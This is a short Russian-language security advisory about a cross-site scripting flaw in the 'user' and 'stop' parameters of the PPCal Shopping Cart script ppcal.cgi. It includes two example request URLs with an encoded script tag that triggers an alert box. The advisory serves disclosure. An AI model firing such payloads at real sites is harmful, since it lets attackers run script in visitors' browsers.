Программа: PPCal Shopping Cart
Уязвимость позволяет удаленному пользователю произвести XSS нападение.
Уязвимость существует при обработке входных данных в параметрах "user" и "stop"
сценария "ppcal.cgi". Удаленный пользователь может с помощью специально
сформированного запроса выполнить произвольный HTML код в браузере жертвы в
контексте безопасности уязвимого сайта.
Примеры:
/ppcal.cgi?action=shop&user=8001&start=21& stop=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E
/ppcal.cgi?action=shop&user=%22%3E%3C script%3Ealert('r0t')%3C/script%3E
